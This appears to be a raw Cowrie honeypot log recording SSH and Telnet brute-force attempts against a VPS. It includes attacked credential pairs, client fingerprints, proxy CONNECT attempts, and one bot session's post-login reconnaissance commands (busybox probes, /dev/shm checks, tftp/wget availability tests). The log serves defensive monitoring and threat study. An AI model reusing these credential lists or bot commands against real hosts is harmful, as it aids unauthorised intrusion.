{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:29:26.051540Z","src_ip":"212.227.235.229","session":"fd3d1035be2b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1337","message":"login attempt [admin/1337] failed","sensor":"my-vps","timestamp":"2025-08-26T08:29:27.840091Z","src_ip":"212.227.235.229","session":"fd3d1035be2b"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:29:29.421720Z","src_ip":"212.227.235.229","session":"fd3d1035be2b"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":44250,"dst_ip":"1.2.3.4","dst_port":23,"session":"a75fc1400e7f","protocol":"telnet","message":"New connection: 123.31.39.100:44250 (1.2.3.4:23) [session: a75fc1400e7f]","sensor":"my-vps","timestamp":"2025-08-26T08:30:08.197929Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54902,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee92cfaf4da2","protocol":"telnet","message":"New connection: 212.227.235.229:54902 (1.2.3.4:23) [session: ee92cfaf4da2]","sensor":"my-vps","timestamp":"2025-08-26T08:30:08.349050Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48532,"dst_ip":"1.2.3.4","dst_port":23,"session":"b0e989686c12","protocol":"telnet","message":"New connection: 212.227.235.229:48532 (1.2.3.4:23) [session: b0e989686c12]","sensor":"my-vps","timestamp":"2025-08-26T08:30:08.372514Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40101,"dst_ip":"1.2.3.4","dst_port":23,"session":"2816606308e4","protocol":"telnet","message":"New connection: 212.227.125.160:40101 (1.2.3.4:23) [session: 2816606308e4]","sensor":"my-vps","timestamp":"2025-08-26T08:30:09.252800Z"}
{"eventid":"cowrie.session.closed","duration":46.19308924674988,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:30:54.390890Z","src_ip":"123.31.39.100","session":"a75fc1400e7f"}
{"eventid":"cowrie.session.closed","duration":46.103370904922485,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:30:54.452356Z","src_ip":"212.227.235.229","session":"ee92cfaf4da2"}
{"eventid":"cowrie.session.closed","duration":46.084956407547,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:30:54.457390Z","src_ip":"212.227.235.229","session":"b0e989686c12"}
{"eventid":"cowrie.session.closed","duration":46.165895223617554,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:30:55.418609Z","src_ip":"212.227.125.160","session":"2816606308e4"}
{"eventid":"cowrie.session.connect","src_ip":"91.134.73.230","src_port":36486,"dst_ip":"1.2.3.4","dst_port":22,"session":"6121596aec23","protocol":"ssh","message":"New connection: 91.134.73.230:36486 (1.2.3.4:22) [session: 6121596aec23]","sensor":"my-vps","timestamp":"2025-08-26T08:31:07.909486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:31:07.910381Z","src_ip":"91.134.73.230","session":"6121596aec23"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-26T08:31:07.930818Z","src_ip":"91.134.73.230","session":"6121596aec23"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:31:07.953435Z","src_ip":"91.134.73.230","session":"6121596aec23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42248,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cbbf2b7d71b","protocol":"ssh","message":"New connection: 212.227.235.229:42248 (1.2.3.4:22) [session: 4cbbf2b7d71b]","sensor":"my-vps","timestamp":"2025-08-26T08:31:37.797480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:31:39.174512Z","src_ip":"212.227.235.229","session":"4cbbf2b7d71b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:31:39.175533Z","src_ip":"212.227.235.229","session":"4cbbf2b7d71b"}
{"eventid":"cowrie.login.success","username":"root","password":"Lochan@123","message":"login attempt [root/Lochan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:31:43.143875Z","src_ip":"212.227.235.229","session":"4cbbf2b7d71b"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:31:43.741490Z","src_ip":"212.227.235.229","session":"4cbbf2b7d71b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49900,"dst_ip":"1.2.3.4","dst_port":22,"session":"6dafc6b3b7cc","protocol":"ssh","message":"New connection: 217.72.205.35:49900 (1.2.3.4:22) [session: 6dafc6b3b7cc]","sensor":"my-vps","timestamp":"2025-08-26T08:33:39.647765Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:33:39.649122Z","src_ip":"217.72.205.35","session":"6dafc6b3b7cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36812,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5b508560979","protocol":"telnet","message":"New connection: 212.227.235.229:36812 (1.2.3.4:23) [session: d5b508560979]","sensor":"my-vps","timestamp":"2025-08-26T08:34:49.765862Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:34:49.953933Z","src_ip":"212.227.235.229","session":"d5b508560979"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:34:50.033673Z","src_ip":"212.227.235.229","session":"d5b508560979"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":49408,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb7d6335def2","protocol":"ssh","message":"New connection: 80.94.95.112:49408 (1.2.3.4:22) [session: eb7d6335def2]","sensor":"my-vps","timestamp":"2025-08-26T08:34:57.545485Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T08:34:57.546196Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T08:34:57.576660Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"smarty","message":"login attempt [admin/smarty] failed","sensor":"my-vps","timestamp":"2025-08-26T08:34:57.782609Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"slayers","message":"login attempt [admin/slayers] failed","sensor":"my-vps","timestamp":"2025-08-26T08:34:58.815665Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"skins","message":"login attempt [admin/skins] failed","sensor":"my-vps","timestamp":"2025-08-26T08:34:59.847656Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"sk8ordie","message":"login attempt [admin/sk8ordie] failed","sensor":"my-vps","timestamp":"2025-08-26T08:35:00.881190Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.login.failed","username":"admin","password":"singh","message":"login attempt [admin/singh] failed","sensor":"my-vps","timestamp":"2025-08-26T08:35:01.914199Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.session.connect","src_ip":"46.50.11.45","src_port":1831,"dst_ip":"1.2.3.4","dst_port":23,"session":"23f1d10782f0","protocol":"telnet","message":"New connection: 46.50.11.45:1831 (1.2.3.4:23) [session: 23f1d10782f0]","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.063713Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1111","message":"login attempt [root/1111] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.383584Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:35:02.462440Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"enable","message":"CMD: enable","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.545551Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"system","message":"CMD: system","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.548911Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.failed","input":"system","message":"Command not found: system","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.549793Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"shell","message":"CMD: shell","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.550768Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.failed","input":"shell","message":"Command not found: shell","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.551509Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"sh","message":"CMD: sh","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.552354Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"cat /proc/mounts; /bin/busybox VAJMK","message":"CMD: cat /proc/mounts; /bin/busybox VAJMK","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.635670Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VAJMK","message":"CMD: cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox VAJMK","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.766649Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"tftp; wget; /bin/busybox VAJMK","message":"CMD: tftp; wget; /bin/busybox VAJMK","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.865236Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.945857Z","src_ip":"80.94.95.112","session":"eb7d6335def2"}
{"eventid":"cowrie.command.input","input":"dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","message":"CMD: dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.954192Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.failed","input":"while read i","message":"Command not found: while read i","sensor":"my-vps","timestamp":"2025-08-26T08:35:02.958056Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"/bin/busybox VAJMK","message":"CMD: /bin/busybox VAJMK","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.121219Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"rm .s; exit","message":"CMD: rm .s; exit","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.123344Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.input","input":"q","message":"CMD: q","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.124761Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.command.failed","input":"q","message":"Command not found: q","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.125511Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/fbaee5a934863565868e26b425cf4c64efe1572cfe6911be89d1e147fdf36e8d","size":3550,"shasum":"fbaee5a934863565868e26b425cf4c64efe1572cfe6911be89d1e147fdf36e8d","duplicate":false,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/fbaee5a934863565868e26b425cf4c64efe1572cfe6911be89d1e147fdf36e8d after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.127465Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.session.closed","duration":1.0680274963378906,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:03.131638Z","src_ip":"46.50.11.45","session":"23f1d10782f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59286,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a804ade8132","protocol":"ssh","message":"New connection: 212.227.125.160:59286 (1.2.3.4:22) [session: 8a804ade8132]","sensor":"my-vps","timestamp":"2025-08-26T08:35:07.762085Z"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:08.237211Z","src_ip":"212.227.125.160","session":"8a804ade8132"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59302,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d2ca1cf5a20","protocol":"ssh","message":"New connection: 212.227.125.160:59302 (1.2.3.4:22) [session: 4d2ca1cf5a20]","sensor":"my-vps","timestamp":"2025-08-26T08:35:08.635809Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:09.335156Z","src_ip":"212.227.125.160","session":"4d2ca1cf5a20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59308,"dst_ip":"1.2.3.4","dst_port":22,"session":"67af55a7c0a1","protocol":"ssh","message":"New connection: 212.227.125.160:59308 (1.2.3.4:22) [session: 67af55a7c0a1]","sensor":"my-vps","timestamp":"2025-08-26T08:35:10.885533Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:11.607015Z","src_ip":"212.227.125.160","session":"67af55a7c0a1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47662,"dst_ip":"1.2.3.4","dst_port":22,"session":"91718fc014f3","protocol":"ssh","message":"New connection: 212.227.235.229:47662 (1.2.3.4:22) [session: 91718fc014f3]","sensor":"my-vps","timestamp":"2025-08-26T08:35:12.027136Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:35:12.525261Z","src_ip":"212.227.235.229","session":"91718fc014f3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:35:12.525975Z","src_ip":"212.227.235.229","session":"91718fc014f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59322,"dst_ip":"1.2.3.4","dst_port":22,"session":"14f5a1c48c3f","protocol":"ssh","message":"New connection: 212.227.125.160:59322 (1.2.3.4:22) [session: 14f5a1c48c3f]","sensor":"my-vps","timestamp":"2025-08-26T08:35:13.161517Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.69.116:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.69.116:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-26T08:35:13.552842Z","src_ip":"212.227.125.160","session":"14f5a1c48c3f"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:13.553898Z","src_ip":"212.227.125.160","session":"14f5a1c48c3f"}
{"eventid":"cowrie.login.success","username":"root","password":"Reset123!","message":"login attempt [root/Reset123!] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:35:16.746971Z","src_ip":"212.227.235.229","session":"91718fc014f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63932,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c9e39f799f1","protocol":"ssh","message":"New connection: 212.227.125.160:63932 (1.2.3.4:22) [session: 2c9e39f799f1]","sensor":"my-vps","timestamp":"2025-08-26T08:35:16.912227Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:17.667100Z","src_ip":"212.227.125.160","session":"2c9e39f799f1"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:17.802477Z","src_ip":"212.227.235.229","session":"91718fc014f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63938,"dst_ip":"1.2.3.4","dst_port":22,"session":"997fbdb361cb","protocol":"ssh","message":"New connection: 212.227.125.160:63938 (1.2.3.4:22) [session: 997fbdb361cb]","sensor":"my-vps","timestamp":"2025-08-26T08:35:18.623483Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.69.116:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.69.116:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-26T08:35:19.050763Z","src_ip":"212.227.125.160","session":"997fbdb361cb"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:19.052707Z","src_ip":"212.227.125.160","session":"997fbdb361cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63954,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd776ae335e7","protocol":"ssh","message":"New connection: 212.227.125.160:63954 (1.2.3.4:22) [session: bd776ae335e7]","sensor":"my-vps","timestamp":"2025-08-26T08:35:21.108566Z"}
{"eventid":"cowrie.client.version","version":"CONNECT 196.251.69.116:80 HTTP/1.0","message":"Remote SSH version: CONNECT 196.251.69.116:80 HTTP/1.0","sensor":"my-vps","timestamp":"2025-08-26T08:35:21.617211Z","src_ip":"212.227.125.160","session":"bd776ae335e7"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:21.618526Z","src_ip":"212.227.125.160","session":"bd776ae335e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63958,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0fe5a944aca","protocol":"ssh","message":"New connection: 212.227.125.160:63958 (1.2.3.4:22) [session: e0fe5a944aca]","sensor":"my-vps","timestamp":"2025-08-26T08:35:23.668664Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:35:24.262342Z","src_ip":"212.227.125.160","session":"e0fe5a944aca"}
